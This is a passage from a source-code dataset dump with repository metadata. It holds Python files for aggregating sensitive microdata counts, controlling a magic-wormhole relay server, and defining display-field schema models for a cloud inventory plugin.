pipeline_steps += pipeline_step
last_output.append(output_dir)
publish_pipeline_endpoint(ws, pipeline_steps, pipeline_name)
| true | true |
f732951c2a10f606835e6edf4dd28492d430def9 | 4,455 | py | Python | aggregator.py | lorrainewongmw/synthetic-data-showcase | c686478e5b58e3a2bc0e3bdd6d6f5c7a8378ff5d | [
"MIT"
] | null | null | null | aggregator.py | lorrainewongmw/synthetic-data-showcase | c686478e5b58e3a2bc0e3bdd6d6f5c7a8378ff5d | [
"MIT"
] | null | null | null | aggregator.py | lorrainewongmw/synthetic-data-showcase | c686478e5b58e3a2bc0e3bdd6d6f5c7a8378ff5d | [
"MIT"
] | null | null | null | import time
import datetime
import logging
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
from os import path
import util as util
def aggregate(config):
"""Aggregates the sensitive microdata at sensitive_microdata_path.
Produces the reportable_aggregates tsv file of aggregate counts rounded down to the closest resolution,
the sensitive_aggregates tsv file of actual aggregate counts, and the
sensitive_rare_by_length tsv and svg files of rare combinations by length.
This stage only needs to be run once for a given sensitive dataset and reporting limit/resolution.
Args:
config: options from the json config file, else default values.
"""
use_columns = config['use_columns']
reporting_length = config['reporting_length']
reporting_resolution = config['reporting_resolution']
parallel_jobs = config['parallel_jobs']
record_limit = config['record_limit']
sensitive_microdata_path = config['sensitive_microdata_path']
sensitive_microdata_delimiter = config['sensitive_microdata_delimiter']
reportable_aggregates_path = config['reportable_aggregates_path']
sensitive_aggregates_path = config['sensitive_aggregates_path']
sensitive_zeros = config['sensitive_zeros']
output_dir = config['output_dir']
prefix = config['prefix']
logging.info(f'Aggregate {sensitive_microdata_path}')
start_time = time.time()
df = util.loadMicrodata(path=sensitive_microdata_path, delimiter=sensitive_microdata_delimiter, record_limit=record_limit, use_columns=use_columns)
row_list = util.genRowList(df=df, sensitive_zeros=sensitive_zeros)
if reporting_length == -1:
reporting_length = max([len(row) for row in row_list])
if use_columns != []:
reporting_length = min(reporting_length, len(use_columns))
length_to_combo_to_count = util.countAllCombos(row_list=row_list, length_limit=reporting_length, parallel_jobs=parallel_jobs)
len_to_combo_count = {length: len(combo_to_count) for length, combo_to_count in length_to_combo_to_count.items()}
len_to_rare_count = {length: len([1 for combo, count in combo_to_count.items() if count < reporting_resolution]) for length, combo_to_count in length_to_combo_to_count.items()}
leakage_tsv = path.join(output_dir, f'{prefix}_sensitive_rare_by_length.tsv')
leakage_svg = path.join(output_dir, f'{prefix}_sensitive_rare_by_length.svg')
with open(leakage_tsv, 'w') as f:
f.write('\t'.join(['sen_combo_length', 'combo_count', 'rare_count', 'rare_proportion'])+'\n')
for length, combo_count in len_to_combo_count.items():
rare_count = len_to_rare_count.get(length, 0)
rare_prop = rare_count / combo_count
f.write('\t'.join([str(length), str(combo_count), str(rare_count), str(rare_prop)])+'\n')
util.plotStats(
x_axis='sen_combo_length',
x_axis_title='Length of Sensitive Combination',
y_bar='combo_count',
y_bar_title='Count of Combinations',
y_line='rare_proportion',
y_line_title=f'Proportion of Rare (<{reporting_resolution}) Combinations',
color='violet',
darker_color='darkviolet',
stats_tsv=leakage_tsv,
stats_svg=leakage_svg,
delimiter='\t',
style='whitegrid',
palette='magma')
with open(reportable_aggregates_path, 'w') as ra:
with open(sensitive_aggregates_path, 'w') as sa:
sa.write('\t'.join(['selections', 'count'])+'\n')
sa.write('\t'.join(['', str(len(df))])+'\n')
ra.write('\t'.join(['selections', 'protected_count'])+'\n')
ra.write('\t'.join(['selections', str(util.protect(len(df), reporting_resolution))])+'\n')
for _, combo_to_count in length_to_combo_to_count.items():
for combo, count in combo_to_count.items():
selections_string = util.comboToString(combo)
protected_count = util.protect(count, reporting_resolution)
sa.write('\t'.join([str(selections_string), str(count)])+'\n')
if protected_count > 0:
ra.write('\t'.join([str(selections_string), str(protected_count)])+'\n')
logging.info(f'Aggregated {sensitive_microdata_path} into {reportable_aggregates_path}, took {datetime.timedelta(seconds = time.time() - start_time)}s')
| 47.903226 | 180 | 0.700561 | import time
import datetime
import logging
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
from os import path
import util as util
def aggregate(config):
use_columns = config['use_columns']
reporting_length = config['reporting_length']
reporting_resolution = config['reporting_resolution']
parallel_jobs = config['parallel_jobs']
record_limit = config['record_limit']
sensitive_microdata_path = config['sensitive_microdata_path']
sensitive_microdata_delimiter = config['sensitive_microdata_delimiter']
reportable_aggregates_path = config['reportable_aggregates_path']
sensitive_aggregates_path = config['sensitive_aggregates_path']
sensitive_zeros = config['sensitive_zeros']
output_dir = config['output_dir']
prefix = config['prefix']
logging.info(f'Aggregate {sensitive_microdata_path}')
start_time = time.time()
df = util.loadMicrodata(path=sensitive_microdata_path, delimiter=sensitive_microdata_delimiter, record_limit=record_limit, use_columns=use_columns)
row_list = util.genRowList(df=df, sensitive_zeros=sensitive_zeros)
if reporting_length == -1:
reporting_length = max([len(row) for row in row_list])
if use_columns != []:
reporting_length = min(reporting_length, len(use_columns))
length_to_combo_to_count = util.countAllCombos(row_list=row_list, length_limit=reporting_length, parallel_jobs=parallel_jobs)
len_to_combo_count = {length: len(combo_to_count) for length, combo_to_count in length_to_combo_to_count.items()}
len_to_rare_count = {length: len([1 for combo, count in combo_to_count.items() if count < reporting_resolution]) for length, combo_to_count in length_to_combo_to_count.items()}
leakage_tsv = path.join(output_dir, f'{prefix}_sensitive_rare_by_length.tsv')
leakage_svg = path.join(output_dir, f'{prefix}_sensitive_rare_by_length.svg')
with open(leakage_tsv, 'w') as f:
f.write('\t'.join(['sen_combo_length', 'combo_count', 'rare_count', 'rare_proportion'])+'\n')
for length, combo_count in len_to_combo_count.items():
rare_count = len_to_rare_count.get(length, 0)
rare_prop = rare_count / combo_count
f.write('\t'.join([str(length), str(combo_count), str(rare_count), str(rare_prop)])+'\n')
util.plotStats(
x_axis='sen_combo_length',
x_axis_title='Length of Sensitive Combination',
y_bar='combo_count',
y_bar_title='Count of Combinations',
y_line='rare_proportion',
y_line_title=f'Proportion of Rare (<{reporting_resolution}) Combinations',
color='violet',
darker_color='darkviolet',
stats_tsv=leakage_tsv,
stats_svg=leakage_svg,
delimiter='\t',
style='whitegrid',
palette='magma')
with open(reportable_aggregates_path, 'w') as ra:
with open(sensitive_aggregates_path, 'w') as sa:
sa.write('\t'.join(['selections', 'count'])+'\n')
sa.write('\t'.join(['', str(len(df))])+'\n')
ra.write('\t'.join(['selections', 'protected_count'])+'\n')
ra.write('\t'.join(['selections', str(util.protect(len(df), reporting_resolution))])+'\n')
for _, combo_to_count in length_to_combo_to_count.items():
for combo, count in combo_to_count.items():
selections_string = util.comboToString(combo)
protected_count = util.protect(count, reporting_resolution)
sa.write('\t'.join([str(selections_string), str(count)])+'\n')
if protected_count > 0:
ra.write('\t'.join([str(selections_string), str(protected_count)])+'\n')
logging.info(f'Aggregated {sensitive_microdata_path} into {reportable_aggregates_path}, took {datetime.timedelta(seconds = time.time() - start_time)}s')
| true | true |
f73295e0bdf841a082ee62af3dfeefbf417d5f78 | 2,131 | py | Python | src/wormhole/server/cmd_server.py | LeastAuthority/magic-wormhole | 2fadadc4dba78f167cfc1295bbea7ee778d22dd5 | [
"MIT"
] | null | null | null | src/wormhole/server/cmd_server.py | LeastAuthority/magic-wormhole | 2fadadc4dba78f167cfc1295bbea7ee778d22dd5 | [
"MIT"
] | null | null | null | src/wormhole/server/cmd_server.py | LeastAuthority/magic-wormhole | 2fadadc4dba78f167cfc1295bbea7ee778d22dd5 | [
"MIT"
] | null | null | null | from __future__ import print_function, unicode_literals
import os, time
from twisted.python import usage
from twisted.scripts import twistd
class MyPlugin(object):
tapname = "xyznode"
def __init__(self, args):
self.args = args
def makeService(self, so):
# delay this import as late as possible, to allow twistd's code to
# accept --reactor= selection
from .server import RelayServer
return RelayServer(
str(self.args.rendezvous),
self.args.advertise_version,
self.args.relay_database_path,
self.args.blur_usage,
signal_error=self.args.signal_error,
stats_file=self.args.stats_json_path,
allow_list=self.args.allow_list,
)
class MyTwistdConfig(twistd.ServerOptions):
subCommands = [("XYZ", None, usage.Options, "node")]
def start_server(args):
c = MyTwistdConfig()
#twistd_args = tuple(args.twistd_args) + ("XYZ",)
base_args = []
if args.no_daemon:
base_args.append("--nodaemon")
twistd_args = base_args + ["XYZ"]
c.parseOptions(tuple(twistd_args))
c.loadedPlugins = {"XYZ": MyPlugin(args)}
print("starting wormhole relay server")
# this forks and never comes back. The parent calls os._exit(0)
twistd.runApp(c)
def kill_server():
try:
f = open("twistd.pid", "r")
except EnvironmentError:
print("Unable to find twistd.pid: is this really a server directory?")
print("oh well, ignoring 'stop'")
return
pid = int(f.read().strip())
f.close()
os.kill(pid, 15)
print("server process %d sent SIGTERM" % pid)
return
def stop_server(args):
kill_server()
def restart_server(args):
kill_server()
time.sleep(0.1)
timeout = 0
while os.path.exists("twistd.pid") and timeout < 10:
if timeout == 0:
print(" waiting for shutdown..")
timeout += 1
time.sleep(1)
if os.path.exists("twistd.pid"):
print("error: unable to shut down old server")
return 1
print(" old server shut down")
start_server(args)
| 29.191781 | 78 | 0.632098 | from __future__ import print_function, unicode_literals
import os, time
from twisted.python import usage
from twisted.scripts import twistd
class MyPlugin(object):
tapname = "xyznode"
def __init__(self, args):
self.args = args
def makeService(self, so):
# accept --reactor= selection
from .server import RelayServer
return RelayServer(
str(self.args.rendezvous),
self.args.advertise_version,
self.args.relay_database_path,
self.args.blur_usage,
signal_error=self.args.signal_error,
stats_file=self.args.stats_json_path,
allow_list=self.args.allow_list,
)
class MyTwistdConfig(twistd.ServerOptions):
subCommands = [("XYZ", None, usage.Options, "node")]
def start_server(args):
c = MyTwistdConfig()
#twistd_args = tuple(args.twistd_args) + ("XYZ",)
base_args = []
if args.no_daemon:
base_args.append("--nodaemon")
twistd_args = base_args + ["XYZ"]
c.parseOptions(tuple(twistd_args))
c.loadedPlugins = {"XYZ": MyPlugin(args)}
print("starting wormhole relay server")
# this forks and never comes back. The parent calls os._exit(0)
twistd.runApp(c)
def kill_server():
try:
f = open("twistd.pid", "r")
except EnvironmentError:
print("Unable to find twistd.pid: is this really a server directory?")
print("oh well, ignoring 'stop'")
return
pid = int(f.read().strip())
f.close()
os.kill(pid, 15)
print("server process %d sent SIGTERM" % pid)
return
def stop_server(args):
kill_server()
def restart_server(args):
kill_server()
time.sleep(0.1)
timeout = 0
while os.path.exists("twistd.pid") and timeout < 10:
if timeout == 0:
print(" waiting for shutdown..")
timeout += 1
time.sleep(1)
if os.path.exists("twistd.pid"):
print("error: unable to shut down old server")
return 1
print(" old server shut down")
start_server(args)
| true | true |
f7329645c63bbeced2675087da6bdc4f97ad2b38 | 14,433 | py | Python | src/spaceone/inventory/libs/schema/dynamic_field.py | xellos00/plugin-aws-cloud-services | 56ac9d6f2edafc5abcd236c046726f169a72e1f6 | [
"Apache-2.0"
] | 2 | 2020-06-22T09:49:22.000Z | 2021-01-03T22:21:27.000Z | src/spaceone/inventory/libs/schema/dynamic_field.py | xellos00/plugin-aws-cloud-services | 56ac9d6f2edafc5abcd236c046726f169a72e1f6 | [
"Apache-2.0"
] | 2 | 2020-07-20T01:58:32.000Z | 2020-08-04T07:41:37.000Z | src/spaceone/inventory/libs/schema/dynamic_field.py | xellos00/plugin-aws-cloud-services | 56ac9d6f2edafc5abcd236c046726f169a72e1f6 | [
"Apache-2.0"
] | 5 | 2020-10-13T15:05:12.000Z | 2021-04-19T10:25:24.000Z | import math
from schematics import Model
from schematics.types import ModelType, StringType, PolyModelType, DictType, ListType, BooleanType
from .dynamic_search import BaseDynamicSearch
BACKGROUND_COLORS = [
'black', 'white',
'gray', 'gray.100', 'gray.200', 'gray.300', 'gray.400', 'gray.500', 'gray.600', 'gray.700', 'gray.800', 'gray.900',
'red', 'red.100', 'red.200', 'red.300', 'red.400', 'red.500', 'red.600', 'red.700', 'red.800', 'red.900',
'coral', 'coral.100', 'coral.200', 'coral.300', 'coral.400', 'coral.500', 'coral.600', 'coral.700', 'coral.800', 'coral.900',
'yellow', 'yellow.100', 'yellow.200', 'yellow.300', 'yellow.400', 'yellow.500', 'yellow.600', 'yellow.700', 'yellow.800', 'yellow.900',
'green', 'green.100', 'green.200', 'green.300', 'green.400', 'green.500', 'green.600', 'green.700', 'green.800', 'green.900',
'blue', 'blue.100', 'blue.200', 'blue.300', 'blue.400', 'blue.500', 'blue.600', 'blue.700', 'blue.800', 'blue.900',
'violet', 'violet.100', 'violet.200', 'violet.300', 'violet.400', 'violet.500', 'violet.600', 'violet.700', 'violet.800', 'violet.900',
'peacock', 'peacock.100', 'peacock.200', 'peacock.300', 'peacock.400', 'peacock.500', 'peacock.600', 'peacock.700', 'peacock.800', 'peacock.900',
'indigo', 'indigo.100', 'indigo.200', 'indigo.300', 'indigo.400', 'indigo.500', 'indigo.600', 'indigo.700', 'indigo.800', 'indigo.900',
]
TYPE_BADGE = ['primary', 'indigo.500', 'coral.600', 'peacock.500', 'green.500']
class FieldReference(Model):
resource_type = StringType()
reference_key = StringType(serialize_when_none=False)
class Icon(Model):
image = StringType(serialize_when_none=False)
color = StringType(default='green', choices=BACKGROUND_COLORS)
class BaseField(Model):
type = StringType(choices=["text", "state", "badge", "list", "dict",
"datetime", "image", "enum", "progress", "size"],
serialize_when_none=False)
options = PolyModelType([Model, DictType(PolyModelType(Model))], serialize_when_none=False)
class FieldViewOption(Model):
link = StringType(serialize_when_none=False)
variables = StringType(serialize_when_none=False)
sortable = BooleanType(serialize_when_none=False)
sort_key = StringType(serialize_when_none=False)
translation_id = StringType(serialize_when_none=False)
default = StringType(serialize_when_none=False)
is_optional = BooleanType(serialize_when_none=False)
postfix = StringType(serialize_when_none=False)
prefix = StringType(serialize_when_none=False)
field_description = StringType(serialize_when_none=False)
class BaseDynamicField(BaseField):
name = StringType()
key = StringType()
reference = ModelType(FieldReference, serialize_when_none=False)
@classmethod
def data_source(cls, name, key, **kwargs):
return cls({'key': key, 'name': name, **kwargs})
class TextDyFieldOptions(FieldViewOption):
pass
class BadgeDyFieldOptions(FieldViewOption):
text_color = StringType(serialize_when_none=False)
shape = StringType(serialize_when_none=False, choices=['SQUARE', 'ROUND'])
outline_color = StringType(serialize_when_none=False, choices=BACKGROUND_COLORS)
background_color = StringType(serialize_when_none=False, choices=BACKGROUND_COLORS)
class StateDyFieldOptions(FieldViewOption):
text_color = StringType(serialize_when_none=False)
icon = ModelType(Icon, serialize_when_none=False)
class ImageDyFieldOptions(FieldViewOption):
image_url = StringType(default='')
width = StringType(serialize_when_none=False)
height = StringType(serialize_when_none=False)
class DateTimeDyFieldOptions(FieldViewOption):
source_type = StringType(default='timestamp', choices=['iso8601', 'timestamp'])
source_format = StringType(serialize_when_none=False)
display_format = StringType(serialize_when_none=False)
class ProgressFieldOptions(FieldViewOption):
unit = StringType(serialize_when_none=False)
class SizeFieldOptions(FieldViewOption):
display_unit = StringType(serialize_when_none=False, choices=('BYTES', 'KB', 'MB', 'GB', 'TB', 'PB'))
source_unit = StringType(serialize_when_none=False, choices=('BYTES', 'KB', 'MB', 'GB', 'TB', 'PB'))
class TextDyField(BaseDynamicField):
type = StringType(default="text")
options = PolyModelType(TextDyFieldOptions, serialize_when_none=False)
@classmethod
def data_source(cls, name, key, **kwargs):
_data_source = {'key': key, 'name': name}
if 'options' in kwargs:
_data_source.update({'options': TextDyFieldOptions(kwargs.get('options'))})
if 'reference' in kwargs:
_data_source.update({'reference': kwargs.get('reference')})
return cls(_data_source)
class StateDyField(BaseDynamicField):
type = StringType(default="state")
options = PolyModelType(StateDyFieldOptions, serialize_when_none=False)
@classmethod
def data_source(cls, name, key, **kwargs):
_data_source = {'key': key, 'name': name}
if 'options' in kwargs:
_data_source.update({'options': StateDyFieldOptions(kwargs.get('options'))})
if 'reference' in kwargs:
_data_source.update({'reference': kwargs.get('reference')})
return cls(_data_source)
class BadgeDyField(BaseDynamicField):
type = StringType(default="badge")
options = PolyModelType(BadgeDyFieldOptions, serialize_when_none=False)
@classmethod
def data_source(cls, name, key, **kwargs):
_data_source = {'key': key, 'name': name}
if 'options' in kwargs:
_data_source.update({'options': BadgeDyFieldOptions(kwargs.get('options'))})
else:
_data_source.update({'options': BadgeDyFieldOptions({'background_color': 'gray.200',
'text_color': 'gray.900'})})
if 'reference' in kwargs:
_data_source.update({'reference': kwargs.get('reference')})
return cls(_data_source)
class ImageDyField(BaseDynamicField):
type = StringType(default="image")
options = PolyModelType(ImageDyFieldOptions, serialize_when_none=False)
@classmethod
def data_source(cls, name, key, **kwargs):
_data_source = {'key': key, 'name': name}
if 'options' in kwargs:
_data_source.update({'options': ImageDyFieldOptions(kwargs.get('options'))})
if 'reference' in kwargs:
_data_source.update({'reference': kwargs.get('reference')})
return cls(_data_source)
class DateTimeDyField(BaseDynamicField):
type = StringType(default="datetime")
options = PolyModelType(DateTimeDyFieldOptions, serialize_when_none=False)
@classmethod
def data_source(cls, name, key, **kwargs):
_data_source = {'key': key, 'name': name}
if 'options' in kwargs:
_data_source.update({'options': DateTimeDyFieldOptions(kwargs.get('options'))})
if 'reference' in kwargs:
_data_source.update({'reference': kwargs.get('reference')})
return cls(_data_source)
class DictDyField(BaseDynamicField):
type = StringType(default="dict")
options = PolyModelType(FieldViewOption, serialize_when_none=False)
class StateItemDyField(BaseField):
type = StringType(default="state")
options = PolyModelType(StateDyFieldOptions, serialize_when_none=False)
@classmethod
def set(cls, options):
return cls({'options': StateDyFieldOptions(options)})
class BadgeItemDyField(BaseField):
type = StringType(default="badge")
options = PolyModelType(BadgeDyFieldOptions, serialize_when_none=False)
@classmethod
def set(cls, options):
return cls({'options': BadgeDyFieldOptions(options)})
class ImageItemDyField(BaseField):
type = StringType(default="image")
options = PolyModelType(ImageDyFieldOptions, serialize_when_none=False)
@classmethod
def set(cls, options):
return cls({'options': ImageDyFieldOptions(options)})
class DatetimeItemDyField(BaseField):
type = StringType(default="datetime")
options = PolyModelType(DateTimeDyFieldOptions, serialize_when_none=False)
@classmethod
def set(cls, options):
return cls({'options': DateTimeDyFieldOptions(options)})
class ListDyFieldOptions(FieldViewOption):
item = PolyModelType([BadgeItemDyField, StateDyField, DateTimeDyField, DictDyField], serialize_when_none=False)
sub_key = StringType(serialize_when_none=False)
delimiter = StringType(serialize_when_none=False)
class ListDyField(BaseDynamicField):
type = StringType(default="list")
options = PolyModelType(ListDyFieldOptions, serialize_when_none=False)
@classmethod
def data_source(cls, name, key, **kwargs):
_data_source = {'key': key, 'name': name}
if 'default_badge' in kwargs:
_default_badge = kwargs.get('default_badge')
_list_options = {'delimiter': ' '}
if 'type' in _default_badge and _default_badge.get('type') == 'outline':
_list_options.update({'item': BadgeItemDyField.set({'outline_color': 'violet.500'})})
elif 'type' in _default_badge and _default_badge.get('type') == 'inline':
_list_options.update({'item': BadgeItemDyField.set({'background_color': 'violet.500'})})
if 'sub_key' in _default_badge:
_list_options.update({'sub_key': _default_badge.get('sub_key')})
if 'delimiter' in _default_badge:
_list_options.update({'delimiter': _default_badge.get('delimiter')})
_data_source.update({'options': ListDyFieldOptions(_list_options)})
if 'options' in kwargs:
_data_source.update({'options': ListDyFieldOptions(kwargs.get('options'))})
if 'reference' in kwargs:
_data_source.update({'reference': kwargs.get('reference')})
return cls(_data_source)
class EnumDyField(BaseDynamicField):
type = StringType(default="enum")
options = DictType(PolyModelType([StateItemDyField, BadgeItemDyField, ImageItemDyField, DatetimeItemDyField]),
serialize_when_none=False,
default={})
@classmethod
def data_source(cls, name, key, **kwargs):
_data_source = {'key': key, 'name': name}
_default_badge = kwargs.get('default_badge', {})
_default_state = kwargs.get('default_state', {})
_default_outline_badge = kwargs.get('default_outline_badge', [])
_options_dic = {}
for _key in _default_outline_badge:
_round_index = len(TYPE_BADGE)
_index = _default_outline_badge.index(_key)
_num = math.floor(_index/len(TYPE_BADGE))
if _num > 0:
_round_index = len(TYPE_BADGE)*_num
if _round_index - 1 < _index:
_index = _index - _round_index
_options_dic[_key] = BadgeItemDyField.set({'outline_color': TYPE_BADGE[_index]})
for _key in _default_badge:
for _badge in _default_badge[_key]:
_options_dic[_badge] = BadgeItemDyField.set({'background_color': _key})
for _key in _default_state:
for _state in _default_state[_key]:
_state_options = {'icon': {'color': 'gray.400'}}
if _key == 'safe':
_state_options = {'icon': {'color': 'green.500'}}
elif _key == 'disable':
_state_options.update({'text_color': 'gray.400'})
elif _key == 'warning':
_state_options = {'icon': {'color': 'yellow.500'}}
elif _key == 'available':
_state_options = {'icon': {'color': 'blue.400'}}
elif _key == 'alert':
_state_options = {'text_color': 'red.500', 'icon': {'color': 'red.500'}}
_options_dic[_state] = StateItemDyField.set(_state_options)
_data_source.update({'options': _options_dic})
if 'options' in kwargs:
_data_source.update({'options': kwargs.get('options')})
if 'reference' in kwargs:
_data_source.update({'reference': kwargs.get('reference')})
return cls(_data_source)
class ProgressField(BaseDynamicField):
type = StringType(default="progress")
options = PolyModelType(ProgressFieldOptions, serialize_when_none=False, )
@classmethod
def data_source(cls, name, key, **kwargs):
_data_source = {'key': key, 'name': name}
if 'options' in kwargs:
_data_source.update({'options': kwargs.get('options')})
return cls(_data_source)
class SizeField(BaseDynamicField):
type = StringType(default="size")
options = PolyModelType(SizeFieldOptions, serialize_when_none=False)
@classmethod
def data_source(cls, name, key, **kwargs):
_data_source = {'key': key, 'name': name}
if 'options' in kwargs:
_data_source.update({'options': kwargs.get('options')})
return cls(_data_source)
class SearchEnumField(Model):
label = StringType(serialize_when_none=False)
icon = ModelType(Icon, serialize_when_none=False)
@classmethod
def set_field(cls, label=None, icon=None):
return_dic = {}
if label is not None:
return_dic.update({'label': label})
if icon is not None:
return_dic.update({'icon': Icon(icon)})
return cls(return_dic)
class SearchField(BaseDynamicSearch):
enums = DictType(ModelType(SearchEnumField), serialize_when_none=False)
reference = StringType(serialize_when_none=False)
@classmethod
def set(cls, name='', key='', data_type=None, enums=None, reference=None):
return_dic = {
'name': name,
'key': key
}
if data_type is not None:
return_dic.update({'data_type': data_type})
if reference is not None:
return_dic.update({'reference': reference})
if enums is not None:
convert_enums = {}
for enum_key in enums:
enum_v = enums[enum_key]
convert_enums[enum_key] = SearchEnumField.set_field(**enum_v)
return_dic.update({
'enums': convert_enums
})
return cls(return_dic)
| 36.355164 | 149 | 0.655304 | import math
from schematics import Model
from schematics.types import ModelType, StringType, PolyModelType, DictType, ListType, BooleanType
from .dynamic_search import BaseDynamicSearch
BACKGROUND_COLORS = [
'black', 'white',
'gray', 'gray.100', 'gray.200', 'gray.300', 'gray.400', 'gray.500', 'gray.600', 'gray.700', 'gray.800', 'gray.900',
'red', 'red.100', 'red.200', 'red.300', 'red.400', 'red.500', 'red.600', 'red.700', 'red.800', 'red.900',
'coral', 'coral.100', 'coral.200', 'coral.300', 'coral.400', 'coral.500', 'coral.600', 'coral.700', 'coral.800', 'coral.900',
'yellow', 'yellow.100', 'yellow.200', 'yellow.300', 'yellow.400', 'yellow.500', 'yellow.600', 'yellow.700', 'yellow.800', 'yellow.900',
'green', 'green.100', 'green.200', 'green.300', 'green.400', 'green.500', 'green.600', 'green.700', 'green.800', 'green.900',
'blue', 'blue.100', 'blue.200', 'blue.300', 'blue.400', 'blue.500', 'blue.600', 'blue.700', 'blue.800', 'blue.900',
'violet', 'violet.100', 'violet.200', 'violet.300', 'violet.400', 'violet.500', 'violet.600', 'violet.700', 'violet.800', 'violet.900',
'peacock', 'peacock.100', 'peacock.200', 'peacock.300', 'peacock.400', 'peacock.500', 'peacock.600', 'peacock.700', 'peacock.800', 'peacock.900',
'indigo', 'indigo.100', 'indigo.200', 'indigo.300', 'indigo.400', 'indigo.500', 'indigo.600', 'indigo.700', 'indigo.800', 'indigo.900',
]
TYPE_BADGE = ['primary', 'indigo.500', 'coral.600', 'peacock.500', 'green.500']
class FieldReference(Model):
resource_type = StringType()
reference_key = StringType(serialize_when_none=False)
class Icon(Model):
image = StringType(serialize_when_none=False)
color = StringType(default='green', choices=BACKGROUND_COLORS)
class BaseField(Model):
type = StringType(choices=["text", "state", "badge", "list", "dict",
"datetime", "image", "enum", "progress", "size"],
serialize_when_none=False)
options = PolyModelType([Model, DictType(PolyModelType(Model))], serialize_when_none=False)
class FieldViewOption(Model):
link = StringType(serialize_when_none=False)
variables = StringType(serialize_when_none=False)
sortable = BooleanType(serialize_when_none=False)
sort_key = StringType(serialize_when_none=False)
translation_id = StringType(serialize_when_none=False)
default = StringType(serialize_when_none=False)
is_optional = BooleanType(serialize_when_none=False)
postfix = StringType(serialize_when_none=False)
prefix = StringType(serialize_when_none=False)
field_description = StringType(serialize_when_none=False)
class BaseDynamicField(BaseField):
name = StringType()
key = StringType()
reference = ModelType(FieldReference, serialize_when_none=False)
@classmethod
def data_source(cls, name, key, **kwargs):
return cls({'key': key, 'name': name, **kwargs})
class TextDyFieldOptions(FieldViewOption):
pass
class BadgeDyFieldOptions(FieldViewOption):
text_color = StringType(serialize_when_none=False)
shape = StringType(serialize_when_none=False, choices=['SQUARE', 'ROUND'])
outline_color = StringType(serialize_when_none=False, choices=BACKGROUND_COLORS)
background_color = StringType(serialize_when_none=False, choices=BACKGROUND_COLORS)
class StateDyFieldOptions(FieldViewOption):
text_color = StringType(serialize_when_none=False)
icon = ModelType(Icon, serialize_when_none=False)
class ImageDyFieldOptions(FieldViewOption):
image_url = StringType(default='')
width = StringType(serialize_when_none=False)
height = StringType(serialize_when_none=False)
class DateTimeDyFieldOptions(FieldViewOption):
source_type = StringType(default='timestamp', choices=['iso8601', 'timestamp'])
source_format = StringType(serialize_when_none=False)
display_format = StringType(serialize_when_none=False)
class ProgressFieldOptions(FieldViewOption):
unit = StringType(serialize_when_none=False)
class SizeFieldOptions(FieldViewOption):
display_unit = StringType(serialize_when_none=False, choices=('BYTES', 'KB', 'MB', 'GB', 'TB', 'PB'))
source_unit = StringType(serialize_when_none=False, choices=('BYTES', 'KB', 'MB', 'GB', 'TB', 'PB'))
class TextDyField(BaseDynamicField):
type = StringType(default="text")
options = PolyModelType(TextDyFieldOptions, serialize_when_none=False)
@classmethod
def data_source(cls, name, key, **kwargs):
_data_source = {'key': key, 'name': name}
if 'options' in kwargs:
_data_source.update({'options': TextDyFieldOptions(kwargs.get('options'))})
if 'reference' in kwargs:
_data_source.update({'reference': kwargs.get('reference')})
return cls(_data_source)
class StateDyField(BaseDynamicField):
type = StringType(default="state")
options = PolyModelType(StateDyFieldOptions, serialize_when_none=False)
@classmethod
def data_source(cls, name, key, **kwargs):
_data_source = {'key': key, 'name': name}
if 'options' in kwargs:
_data_source.update({'options': StateDyFieldOptions(kwargs.get('options'))})
if 'reference' in kwargs:
_data_source.update({'reference': kwargs.get('reference')})
return cls(_data_source)
class BadgeDyField(BaseDynamicField):
type = StringType(default="badge")
options = PolyModelType(BadgeDyFieldOptions, serialize_when_none=False)
@classmethod
def data_source(cls, name, key, **kwargs):
_data_source = {'key': key, 'name': name}
if 'options' in kwargs:
_data_source.update({'options': BadgeDyFieldOptions(kwargs.get('options'))})
else:
_data_source.update({'options': BadgeDyFieldOptions({'background_color': 'gray.200',
'text_color': 'gray.900'})})
if 'reference' in kwargs:
_data_source.update({'reference': kwargs.get('reference')})
return cls(_data_source)
class ImageDyField(BaseDynamicField):
type = StringType(default="image")
options = PolyModelType(ImageDyFieldOptions, serialize_when_none=False)
@classmethod
def data_source(cls, name, key, **kwargs):
_data_source = {'key': key, 'name': name}
if 'options' in kwargs:
_data_source.update({'options': ImageDyFieldOptions(kwargs.get('options'))})
if 'reference' in kwargs:
_data_source.update({'reference': kwargs.get('reference')})
return cls(_data_source)
class DateTimeDyField(BaseDynamicField):
type = StringType(default="datetime")
options = PolyModelType(DateTimeDyFieldOptions, serialize_when_none=False)
@classmethod
def data_source(cls, name, key, **kwargs):
_data_source = {'key': key, 'name': name}
if 'options' in kwargs:
_data_source.update({'options': DateTimeDyFieldOptions(kwargs.get('options'))})
if 'reference' in kwargs:
_data_source.update({'reference': kwargs.get('reference')})
return cls(_data_source)
class DictDyField(BaseDynamicField):
type = StringType(default="dict")
options = PolyModelType(FieldViewOption, serialize_when_none=False)
class StateItemDyField(BaseField):
type = StringType(default="state")
options = PolyModelType(StateDyFieldOptions, serialize_when_none=False)
@classmethod
def set(cls, options):
return cls({'options': StateDyFieldOptions(options)})
class BadgeItemDyField(BaseField):
type = StringType(default="badge")
options = PolyModelType(BadgeDyFieldOptions, serialize_when_none=False)
@classmethod
def set(cls, options):
return cls({'options': BadgeDyFieldOptions(options)})
class ImageItemDyField(BaseField):
type = StringType(default="image")
options = PolyModelType(ImageDyFieldOptions, serialize_when_none=False)
@classmethod
def set(cls, options):
return cls({'options': ImageDyFieldOptions(options)})
class DatetimeItemDyField(BaseField):
type = StringType(default="datetime")
options = PolyModelType(DateTimeDyFieldOptions, serialize_when_none=False)
@classmethod
def set(cls, options):
return cls({'options': DateTimeDyFieldOptions(options)})
class ListDyFieldOptions(FieldViewOption):
item = PolyModelType([BadgeItemDyField, StateDyField, DateTimeDyField, DictDyField], serialize_when_none=False)
sub_key = StringType(serialize_when_none=False)
delimiter = StringType(serialize_when_none=False)
class ListDyField(BaseDynamicField):
type = StringType(default="list")
options = PolyModelType(ListDyFieldOptions, serialize_when_none=False)
@classmethod
def data_source(cls, name, key, **kwargs):
_data_source = {'key': key, 'name': name}
if 'default_badge' in kwargs:
_default_badge = kwargs.get('default_badge')
_list_options = {'delimiter': ' '}
if 'type' in _default_badge and _default_badge.get('type') == 'outline':
_list_options.update({'item': BadgeItemDyField.set({'outline_color': 'violet.500'})})
elif 'type' in _default_badge and _default_badge.get('type') == 'inline':
_list_options.update({'item': BadgeItemDyField.set({'background_color': 'violet.500'})})
if 'sub_key' in _default_badge:
